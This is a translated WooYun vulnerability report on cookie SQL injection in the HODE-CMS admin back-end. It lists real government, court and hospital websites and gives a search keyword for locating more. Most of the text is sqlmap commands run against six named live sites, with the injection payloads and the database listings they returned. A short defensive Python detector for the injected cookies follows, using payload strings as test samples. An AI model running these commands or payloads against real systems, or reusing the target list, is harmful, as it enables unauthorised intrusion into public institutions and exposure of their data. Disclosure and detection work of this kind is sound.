
Vulnerability summary

Defect ID: wooyun-2014-077082

Title: SQL injection vulnerability in a widely deployed government web application

Vendor: 南京希迪麦德软件有限公司

Author: Mr.leo

Submitted: 2014-09-23 17:05

Fix time: 2014-12-22 17:06

Published: 2014-12-22 17:06

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-09-23: actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2014-12-22: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

BOOM!!

Detailed description:

WooYun: SQL injection vulnerability in a widely deployed government web application (admin back-end bypass)
From previous experience, the default admin back-end is http://admin.xxx.gov.cn/general/
The back-end URL is vulnerable to cookie injection; the injectable parameters are loginlast and passwdlast. loginlast is used as the example here; the vendor should check and fix the others itself.
Technical support: 南京希迪麦德软件有限公司
Cases:
http://www.zjrzfy.gov.cn/ Zhenjiang Runzhou District People's Court
http://www.zjzy.gov.cn/ Zhenjiang Intermediate People's Court
http://www.jsjrfy.gov.cn/ Jurong People's Court
http://www.njng.gov.cn/ Nanjing Ninggao High-Tech Industrial Park
http://www.jsrepc.com/ Jiangsu Radiation Environmental Protection Consulting Center
http://www.sundy-whcy.com/ Shengdian Cultural and Creative Legal Services Network
http://www.njlsjjjc.gov.cn/ Lishui Discipline Inspection and Supervision Network
http://www.jzscxh.com/ Jiangsu Construction Market Management Association
http://www.jnkjj.gov.cn/ Jiangning Science and Technology Bureau
http://www.jszlyy.com.cn/ Jiangsu Cancer Hospital
http://cxy.jnkjj.gov.cn/ Jiangning District Industry-University-Research Cooperation Information Network
Baidu search keyword: HODE-CMS
Six cases as proof:
Sqlmap -u "http://admin.zjrzfy.gov.cn/general/index.php" --cookie "loginlast=" --level=2
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: loginlast
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: loginlast=' AND (SELECT 5122 FROM(SELECT COUNT(*),CONCAT(0x3a696d783a,(SELECT (CASE WHEN (5122=5122) THEN 1 ELSE 0 END)),0x3a636d753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'UFrm'='UFrm
---
[16:22:05] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.6, Apache 2.2.25
back-end DBMS: MySQL 5.0
[16:22:05] [INFO] fetching tables for database: 'gbk_cms2012_zjrzfy'
[16:22:05] [INFO] heuristics detected web page charset 'GB2312'
[16:22:06] [WARNING] reflective value(s) found and filtering out
[16:22:06] [INFO] the SQL query used returns 35 entries
you provided a HTTP Cookie header value. The target url provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] n
[16:22:08] [INFO] retrieved: x_article
[16:22:08] [INFO] retrieved: x_column
[16:22:08] [INFO] retrieved: x_columntemplate
[16:22:09] [INFO] retrieved: x_element
[16:22:09] [INFO] retrieved: x_extra
[16:22:09] [INFO] retrieved: x_flash
[16:22:11] [INFO] retrieved: x_friendlink
[16:22:11] [INFO] retrieved: x_function
[16:22:11] [INFO] retrieved: x_guestbook_new
[16:22:12] [INFO] retrieved: x_info
[16:22:27] [INFO] retrieved: x_infoclass
[16:22:28] [INFO] retrieved: x_ip
[16:22:29] [INFO] retrieved: x_linkclass
[16:22:29] [INFO] retrieved: x_linkinfo
[16:22:30] [INFO] retrieved: x_mapping
[16:22:30] [INFO] retrieved: x_member
[16:22:30] [INFO] retrieved: x_member2
[16:22:30] [INFO] retrieved: x_memberpart
[16:22:30] [INFO] retrieved: x_partprms
[16:22:30] [INFO] retrieved: x_permitcolumn
[16:22:31] [INFO] retrieved: x_permitinfo
[16:22:32] [INFO] retrieved: x_permitmember
[16:22:33] [INFO] retrieved: x_permitrole
[16:22:33] [INFO] retrieved: x_pic
[16:22:33] [INFO] retrieved: x_shield
[16:22:33] [INFO] retrieved: x_siteconfig
Sqlmap -u "http://admin.njng.gov.cn/general/index.php" --cookie "loginlast=" --level=2
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: loginlast
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: loginlast=' AND (SELECT 5432 FROM(SELECT COUNT(*),CONCAT(0x3a7066773a,(SELECT (CASE WHEN (5432=5432) THEN 1 ELSE 0 END)),0x3a7878693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NuVa'='NuVa
---
[16:34:57] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.6, Apache 2.2.25
back-end DBMS: MySQL 5.0
[16:34:57] [INFO] fetching database names
[16:34:59] [INFO] heuristics detected web page charset 'GB2312'
[16:34:59] [WARNING] reflective value(s) found and filtering out
[16:34:59] [INFO] the SQL query used returns 31 entries
you provided a HTTP Cookie header value. The target url provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] n
[16:35:01] [INFO] retrieved: information_schema
[16:35:01] [INFO] retrieved: cms2011_zjzy
[16:35:02] [INFO] retrieved: cms2012_dtfy
[16:35:02] [INFO] retrieved: cms2012_jrfy
[16:35:02] [INFO] retrieved: cms2012_ngy
[16:35:03] [INFO] retrieved: cms2013_lsjw
[16:35:03] [INFO] retrieved: cms_gqtxw
[16:35:03] [INFO] retrieved: cms_jnwj
[16:35:03] [INFO] retrieved: cms_jsyy
[16:35:03] [INFO] retrieved: cms_jszlyy
[16:35:03] [INFO] retrieved: cms_xlwjd2011
[16:35:03] [INFO] retrieved: cms_xwhjd
[16:35:03] [INFO] retrieved: cms_zjkfq2012
[16:35:04] [INFO] retrieved: gbk_cms2011_zjzy
[16:35:04] [INFO] retrieved: gbk_cms2012_dtfy
[16:35:04] [INFO] retrieved: gbk_cms2012_jrfy
[16:35:04] [INFO] retrieved: gbk_cms2012_ngy
[16:35:06] [INFO] retrieved: gbk_cms2012_sdwh
[16:35:06] [INFO] retrieved: gbk_cms2012_wxg
[16:35:10] [INFO] retrieved: gbk_cms2012_zjrzfy
[16:35:10] [INFO] retrieved: gbk_cms2013_jzscglxh
[16:35:11] [INFO] retrieved: gbk_cms2014_fshbzx
[16:35:12] [INFO] retrieved: gbk_cms2014_hodesoft
[16:35:12] [INFO] retrieved: gbk_cms_gcp_jszl
[16:35:12] [INFO] retrieved: gbk_cms_gqtxw
[16:35:14] [INFO] retrieved: gbk_cms_jsyy
[16:35:14] [INFO] retrieved: gbk_cms_jszlyy
[16:35:14] [INFO] retrieved: gbk_cms_xlwjd2011
[16:35:15] [INFO] retrieved: gbk_cms_zjkfq2012
[16:35:16] [INFO] retrieved: mysql
[16:35:17] [INFO] retrieved: test
Sqlmap -u "admin.njcredit.gov.cn/general/index.php" --cookie "loginlast=" --level=2
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: loginlast
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: loginlast=' AND (SELECT 9272 FROM(SELECT COUNT(*),CONCAT(0x3a7371633a,(SELECT (CASE WHEN (9272=9272) THEN 1 ELSE 0 END)),0x3a7378703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fCLn'='fCLn
---
[16:34:57] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.6, Apache 2.2.25
back-end DBMS: MySQL 5.0
[16:34:57] [INFO] fetching database names
[16:34:57] [INFO] heuristics detected web page charset 'GB2312'
[16:34:57] [WARNING] reflective value(s) found and filtering out
[16:34:57] [INFO] the SQL query used returns 7 entries
you provided a HTTP Cookie header value. The target url provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] n
[16:34:59] [INFO] retrieved: information_schema
[16:34:59] [INFO] retrieved: gbk_cms2013_njcredit
[16:34:59] [INFO] retrieved: grzyzg
[16:34:59] [INFO] retrieved: mysql
[16:34:59] [INFO] retrieved: njic_enterprise
[16:34:59] [INFO] retrieved: performance_schema
[16:34:59] [INFO] retrieved: test
available databases [7]:
[*] gbk_cms2013_njcredit
[*] grzyzg
[*] information_schema
[*] mysql
[*] njic_enterprise
[*] performance_schema
[*] test
Sqlmap -u "http://admin.zjzy.gov.cn/general/index.php" --cookie "loginlast=" --level=2
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: loginlast
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: loginlast=' AND (SELECT 9206 FROM(SELECT COUNT(*),CONCAT(0x3a6374623a,(SELECT (CASE WHEN (9206=9206) THEN 1 ELSE 0 END)),0x3a6975793a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PkQX'='PkQX
---
[16:41:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.6, Apache 2.2.25
back-end DBMS: MySQL 5.0
[16:41:23] [INFO] fetching database names
[16:41:23] [INFO] heuristics detected web page charset 'GB2312'
[16:41:23] [WARNING] reflective value(s) found and filtering out
[16:41:23] [INFO] the SQL query used returns 31 entries
you provided a HTTP Cookie header value. The target url provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] n
[16:41:25] [INFO] retrieved: information_schema
[16:41:26] [INFO] retrieved: cms2011_zjzy
[16:41:33] [INFO] retrieved: cms2012_dtfy
[16:41:33] [INFO] retrieved: cms2012_jrfy
[16:41:34] [INFO] retrieved: cms2012_ngy
[16:41:35] [INFO] retrieved: cms2013_lsjw
[16:41:36] [INFO] retrieved: cms_gqtxw
[16:41:36] [INFO] retrieved: cms_jnwj
[16:41:36] [INFO] retrieved: cms_jsyy
[16:41:36] [INFO] retrieved: cms_jszlyy
[16:41:36] [INFO] retrieved: cms_xlwjd2011
[16:41:36] [INFO] retrieved: cms_xwhjd
[16:41:36] [INFO] retrieved: cms_zjkfq2012
[16:41:36] [INFO] retrieved: gbk_cms2011_zjzy
[16:41:36] [INFO] retrieved: gbk_cms2012_dtfy
[16:41:38] [INFO] retrieved: gbk_cms2012_jrfy
[16:41:40] [INFO] retrieved: gbk_cms2012_ngy
[16:41:40] [INFO] retrieved: gbk_cms2012_sdwh
[16:41:40] [INFO] retrieved: gbk_cms2012_wxg
[16:41:40] [INFO] retrieved: gbk_cms2012_zjrzfy
[16:41:40] [INFO] retrieved: gbk_cms2013_jzscglxh
[16:41:40] [INFO] retrieved: gbk_cms2014_fshbzx
[16:41:41] [INFO] retrieved: gbk_cms2014_hodesoft
[16:41:42] [INFO] retrieved: gbk_cms_gcp_jszl
[16:41:43] [INFO] retrieved: gbk_cms_gqtxw
[16:41:44] [INFO] retrieved: gbk_cms_jsyy
[16:41:45] [INFO] retrieved: gbk_cms_jszlyy
[16:41:45] [INFO] retrieved: gbk_cms_xlwjd2011
[16:41:45] [INFO] retrieved: gbk_cms_zjkfq2012
[16:41:45] [INFO] retrieved: mysql
[16:41:45] [INFO] retrieved: test
available databases [31]:
[*] cms2011_zjzy
[*] cms2012_dtfy
[*] cms2012_jrfy
[*] cms2012_ngy
[*] cms2013_lsjw
[*] cms_gqtxw
[*] cms_jnwj
[*] cms_jsyy
[*] cms_jszlyy
[*] cms_xlwjd2011
[*] cms_xwhjd
[*] cms_zjkfq2012
[*] gbk_cms2011_zjzy
[*] gbk_cms2012_dtfy
[*] gbk_cms2012_jrfy
[*] gbk_cms2012_ngy
[*] gbk_cms2012_sdwh
[*] gbk_cms2012_wxg
[*] gbk_cms2012_zjrzfy
[*] gbk_cms2013_jzscglxh
[*] gbk_cms2014_fshbzx
[*] gbk_cms2014_hodesoft
[*] gbk_cms_gcp_jszl
[*] gbk_cms_gqtxw
Sqlmap -u "http://admin.jsjrfy.gov.cn/general/index.php" --cookie "loginlast=" --level=2
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: loginlast
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: loginlast=' AND (SELECT 4432 FROM(SELECT COUNT(*),CONCAT(0x3a6169613a,(SELECT (CASE WHEN (4432=4432) THEN 1 ELSE 0 END)),0x3a6f726f3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YpJb'='YpJb
---
[16:44:05] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.6, Apache 2.2.25
back-end DBMS: MySQL 5.0
[16:44:05] [INFO] fetching database names
[16:44:05] [INFO] heuristics detected web page charset 'GB2312'
[16:44:05] [WARNING] reflective value(s) found and filtering out
[16:44:05] [INFO] the SQL query used returns 31 entries
you provided a HTTP Cookie header value. The target url provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] n
[16:44:08] [INFO] retrieved: information_schema
[16:44:12] [INFO] retrieved: cms2011_zjzy
[16:44:13] [INFO] retrieved: cms2012_dtfy
[16:44:14] [INFO] retrieved: cms2012_jrfy
[16:44:14] [INFO] retrieved: cms2012_ngy
[16:44:15] [INFO] retrieved: cms2013_lsjw
[16:44:15] [INFO] retrieved: cms_gqtxw
[16:44:16] [INFO] retrieved: cms_jnwj
[16:44:17] [INFO] retrieved: cms_jsyy
[16:44:18] [INFO] retrieved: cms_jszlyy
[16:44:19] [INFO] retrieved: cms_xlwjd2011
[16:44:19] [INFO] retrieved: cms_xwhjd
[16:44:20] [INFO] retrieved: cms_zjkfq2012
[16:44:21] [INFO] retrieved: gbk_cms2011_zjzy
[16:44:21] [INFO] retrieved: gbk_cms2012_dtfy
[16:44:22] [INFO] retrieved: gbk_cms2012_jrfy
[16:44:22] [INFO] retrieved: gbk_cms2012_ngy
[16:44:23] [INFO] retrieved: gbk_cms2012_sdwh
[16:44:23] [INFO] retrieved: gbk_cms2012_wxg
[16:44:23] [INFO] retrieved: gbk_cms2012_zjrzfy
[16:44:23] [INFO] retrieved: gbk_cms2013_jzscglxh
[16:44:23] [INFO] retrieved: gbk_cms2014_fshbzx
[16:44:24] [INFO] retrieved: gbk_cms2014_hodesoft
[16:44:24] [INFO] retrieved: gbk_cms_gcp_jszl
[16:44:24] [INFO] retrieved: gbk_cms_gqtxw
[16:44:24] [INFO] retrieved: gbk_cms_jsyy
[16:44:24] [INFO] retrieved: gbk_cms_jszlyy
[16:44:24] [INFO] retrieved: gbk_cms_xlwjd2011
[16:44:24] [INFO] retrieved: gbk_cms_zjkfq2012
[16:44:25] [INFO] retrieved: mysql
[16:44:25] [INFO] retrieved: test
available databases [31]:
[*] cms2011_zjzy
[*] cms2012_dtfy
[*] cms2012_jrfy
[*] cms2012_ngy
[*] cms2013_lsjw
[*] cms_gqtxw
[*] cms_jnwj
Sqlmap -u "http://admin.jsrepc.com/general/index.php" --cookie "loginlast=" --level=2
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: loginlast
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: loginlast=' AND (SELECT 5803 FROM(SELECT COUNT(*),CONCAT(0x3a6476683a,(SELECT (CASE WHEN (5803=5803) THEN 1 ELSE 0 END)),0x3a7879693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'oDSk'='oDSk
---
[16:45:50] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.6, Apache 2.2.25
back-end DBMS: MySQL 5.0
[16:45:50] [INFO] fetching database names
[16:45:50] [INFO] heuristics detected web page charset 'GB2312'
[16:45:50] [WARNING] reflective value(s) found and filtering out
[16:45:50] [INFO] the SQL query used returns 31 entries
you provided a HTTP Cookie header value. The target url provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] n
[16:52:17] [INFO] retrieved: information_schema
[16:52:18] [INFO] retrieved: cms2011_zjzy
[16:52:18] [INFO] retrieved: cms2012_dtfy
[16:52:18] [INFO] retrieved: cms2012_jrfy
[16:52:18] [INFO] retrieved: cms2012_ngy
[16:52:18] [INFO] retrieved: cms2013_lsjw
[16:52:18] [INFO] retrieved: cms_gqtxw
[16:52:18] [INFO] retrieved: cms_jnwj
[16:52:18] [INFO] retrieved: cms_jsyy
[16:52:19] [INFO] retrieved: cms_jszlyy
[16:52:19] [INFO] retrieved: cms_xlwjd2011
[16:52:19] [INFO] retrieved: cms_xwhjd
[16:52:19] [INFO] retrieved: cms_zjkfq2012
[16:52:19] [INFO] retrieved: gbk_cms2011_zjzy
[16:52:19] [INFO] retrieved: gbk_cms2012_dtfy
[16:52:19] [INFO] retrieved: gbk_cms2012_jrfy
[16:52:19] [INFO] retrieved: gbk_cms2012_ngy
[16:52:19] [INFO] retrieved: gbk_cms2012_sdwh
[16:52:19] [INFO] retrieved: gbk_cms2012_wxg
[16:52:19] [INFO] retrieved: gbk_cms2012_zjrzfy
[16:52:19] [INFO] retrieved: gbk_cms2013_jzscglxh
[16:52:19] [INFO] retrieved: gbk_cms2014_fshbzx
[16:52:20] [INFO] retrieved: gbk_cms2014_hodesoft
[16:52:20] [INFO] retrieved: gbk_cms_gcp_jszl
[16:52:20] [INFO] retrieved: gbk_cms_gqtxw
[16:52:20] [INFO] retrieved: gbk_cms_jsyy
[16:52:20] [INFO] retrieved: gbk_cms_jszlyy
[16:52:21] [INFO] retrieved: gbk_cms_xlwjd2011
[16:52:21] [INFO] retrieved: gbk_cms_zjkfq2012
[16:52:22] [INFO] retrieved: mysql
[16:52:22] [INFO] retrieved: test
available databases [31]:
[*] cms2011_zjzy
[*] cms2012_dtfy

Proof of vulnerability:

Already proven

Remediation:

Parameters carried in the cookie must be filtered as well.
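Until the vendor fixes the input handling, operators can at least watch for this attack in their logs. The following Python is an added defender-side example, not code from the report, from sqlmap or from the vendor: it parses the Cookie header of requests to the /general/ back-end and flags the loginlast/passwdlast values that carry SQL metacharacters or fragments of the error-based payload shown in the sqlmap output above. The request lines are constructed for the example, not captured traffic.

```python
import re
from urllib.parse import unquote

# Cookie names the report identifies as injectable on /general/index.php.
WATCHED_COOKIES = {"loginlast", "passwdlast"}

# Fragments of the error-based payload that sqlmap produced in the report.
SIGNATURES = {
    "floor-rand dup-key": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "information_schema": re.compile(r"INFORMATION_SCHEMA\.", re.I),
    "nested select": re.compile(r"\bAND\s*\(\s*SELECT\b", re.I),
}
# A quote or comment marker inside a login cookie is already anomalous.
METACHARS = re.compile(r"""['"]|--|/\*""")

def parse_cookie_header(header: str) -> dict:
    """Tolerant Cookie-header parser: injected values are not RFC 6265 clean,
    so split on ';' and the first '=' instead of relying on http.cookies."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name.strip()] = unquote(value.strip())
    return cookies

def inspect_cookie_header(header: str) -> list:
    """Return (cookie name, reason) findings for the watched cookies only."""
    findings = []
    for name, value in parse_cookie_header(header).items():
        if name not in WATCHED_COOKIES:
            continue
        if METACHARS.search(value):
            findings.append((name, "sql metacharacter"))
        findings += [(name, label) for label, sig in SIGNATURES.items() if sig.search(value)]
    return findings

# Constructed request lines ("<method> <path> Cookie: <header>"), not real traffic.
SAMPLE_REQUESTS = [
    "GET /general/index.php Cookie: PHPSESSID=abc123; loginlast=admin; passwdlast=x",
    "GET /general/index.php Cookie: loginlast=' AND (SELECT 1 FROM(SELECT COUNT(*),"
    "CONCAT(0x3a,(SELECT 1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS "
    "GROUP BY x)a) AND 'a'='a",
    "GET /general/index.php Cookie: loginlast=admin; passwdlast=%27%20OR%201%3D1--",
]

def scan(requests=SAMPLE_REQUESTS) -> list:
    """Indices of requests whose loginlast/passwdlast cookies look injected."""
    return [i for i, line in enumerate(requests)
            if inspect_cookie_header(line.partition("Cookie: ")[2])]
```

Running scan() on the constructed requests flags the second and third lines; the first, a normal login cookie pair, passes. The same check belongs server-side too: a cookie value that reaches the SQL layer at all should go through a prepared statement, never string concatenation.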

Copyright notice: when reposting, please credit the source: Mr.leo @ WooYun


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined.